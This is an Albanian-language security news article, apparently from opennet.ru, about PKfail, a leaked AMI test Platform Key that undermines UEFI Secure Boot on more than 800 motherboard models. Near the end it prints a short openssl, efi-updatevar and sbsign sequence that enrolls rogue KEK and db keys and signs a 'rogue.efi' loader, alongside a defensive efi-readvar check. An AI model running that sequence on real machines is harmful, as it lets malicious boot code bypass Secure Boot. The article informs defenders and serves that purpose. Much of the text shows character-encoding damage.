Në 806 modele të pllakave amë u zbulua një çelës provimi që lejon kalimin e UEFI Secure Boot

Kërkuesit për sigurinë nga kompania Binarly identifikuan një mundësi për të anashkaluar modulin e ngarkesës së verifikuar UEFI Secure Boot në më shumë se 800 produkte të lëshuara nga kompanitë Acer, Dell, Fujitsu, Gigabyte, HP, Intel, Lenovo dhe Supermicro. Problemi ka marrë emrin PKfail dhe lidhet me përdorimin në firmware të një çelësi të platformës (PK, Platform Key) që nuk është i besueshëm, i gjeneruar nga kompania AMI (American Megatrends International) dhe i ofruar si një shembull testimi. Firmware më të vjetra që përdornin çelësin e testimit janë lëshuar në vitin 2012, dhe ato më të reja datohen deri në qershor 2024. Sipas të dhënave nga kërkuesit, më shumë se 10% e të gjitha firmware të verifikuara janë të ndjeshme ndaj këtij problemi.

Në parametrat e çelësit ishte e specifikuar se ai nuk është i besueshëm dhe nuk duhet të ofrohet në produktet e tyre. Nënkuptohej se ky çelës testimi duhet të zëvendësohej me një çelës të tyre, por prodhuesit nuk iu kushtuan vëmendje paralajmërimit dhe përdorën në firmware të përfunduar një çelës të zakonshëm të përgjithshëm, i dërguar të gjithë partnerëve dhe klientëve të kompanisë AMI.

Pjesa e mbyllur e çelĂ«sit tĂ« testit AMI, e nevojshme pĂ«r tĂ« krijuar nĂ«nshkrime digjitale, u bĂ« e aksesueshme publikisht pas njĂ« rrjedhjeje informacioni nga njĂ« nga prodhuesit e pajisjeve, punonjĂ«si i tĂ« cilit me gabim e postoi nĂ« njĂ« depo tĂ« hapur nĂ« GitHub kodin qĂ« pĂ«rmbante kĂ«tĂ« çelĂ«s. ÇelĂ«si i mbyllur ishte vendosur nĂ« njĂ« skedĂ« tĂ« enkriptuar, pĂ«r tĂ« cilĂ«n ishte pĂ«rdorur njĂ« fjalĂ«kalim i thjeshtĂ« 4-shifror, tĂ« cilin ishte lehtĂ« ta adresohej me metodĂ«n e provave.

ÇelĂ«si i platformĂ«s pĂ«rdoret si rrĂ«nja e besimit pĂ«r tĂ« nĂ«nshkruar databazat me çelĂ«sa pĂ«r Secure Boot. Marrja e pjesĂ«s sĂ« mbyllur tĂ« çelĂ«sit tĂ« platformĂ«s çon nĂ« kompromise tĂ« tĂ« gjithĂ« zinxhirit tĂ« besimit, i angazhuar nĂ« verifikimin e validitetit tĂ« komponenteve tĂ« ngarkesĂ«s sĂ« sistemit – duke e ditur çelĂ«sin e platformĂ«s Ă«shtĂ« e mundur tĂ« anashkalohet mbrojtja e Secure Boot dhe tĂ« organizohet zĂ«vendĂ«simi i komponenteve tĂ« veta gjatĂ« ngarkesĂ«s pĂ«rmes manipulimit tĂ« çelĂ«sit KEK (Key Exchange Key) dhe bazave tĂ« tĂ« dhĂ«nave "db" (Signature Database) dhe "dbx" (Forbidden Signature Database). KEK Ă«shtĂ« pĂ«rgjegjĂ«s pĂ«r krijimin e zinxhirit tĂ« besimit midis firmware-it dhe sistemit tĂ« operimit, "db" pĂ«rmban certifikatat dhe nĂ«nshkrimet pĂ«r ngarkuesin dhe komponentet e jashtme UEFI, ndĂ«rsa "dbx" pĂ«rfshin nĂ«nshkrimet e tĂ«rhequra tĂ« komponenteve tĂ« njohura si tĂ« dĂ«mshme.

PĂ«r tĂ« kryer njĂ« sulm, mjafton tĂ« gjeneroni çelĂ«sa dhe certifikata tĂ« reja pĂ«r KEK dhe db, pas sĂ« cilĂ«s tĂ« pĂ«rdorni çelĂ«sin e testit tĂ« platformĂ«s qĂ« ka dalĂ« nĂ« duar tĂ« hapura pĂ«r tĂ« ngarkuar nĂ« firmware-n UEFI tĂ« certifikatĂ«s KEK tĂ« krijuar. Pas ngarkimit tĂ« certifikatĂ«s KEK nĂ« firmware, mund tĂ« pĂ«rdorni çelĂ«sin e mbyllur tĂ« lidhur me tĂ« pĂ«r tĂ« ngarkuar njĂ« certifikatĂ« tĂ« re nĂ« bazĂ«n e tĂ« dhĂ«nave db. Pas ngarkimit tĂ« certifikatĂ«s db, çelĂ«si i mbyllur i lidhur me tĂ« mund tĂ« pĂ«rdoret pĂ«r tĂ« nĂ«nshkruar komponentĂ«t EFI tĂ« ngarkuar. openssl req -newkey rsa:4096 -nodes -keyout KEK.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY KEK/" -out KEK.crt openssl req -newkey rsa:4096 -nodes -keyout db.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY db/" -out db.crt efi-updatevar -a -c KEK.crt -k PK.key KEK efi-updatevar -a -c db.crt -k KEK.key db sbsign —key db.key —cert db.crt —output rogue.efi.signed rogue.efi

PĂ«r tĂ« verifikuar saktĂ«sinĂ« e çelĂ«sit tĂ« platformĂ«s, mjafton tĂ« ekzekutoni utilitarin "efi-readvar -v PK" nga paketi efitools dhe tĂ« siguroheni qĂ« çelĂ«si i platformĂ«s nuk Ă«shtĂ« testues: efi-readvar -v PK Variable PK, length 862 PK: List 0, type X509 Signature 0, size 834, owner 26dc4851-195f-4ae1-9a19-fbf883bbb35e Subject: CN=DO NOT TRUST — AMI Test PK Issuer: CN=DO NOT TRUST — AMI Test PK

Luaj videon


Burimi: opennet.ru
Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster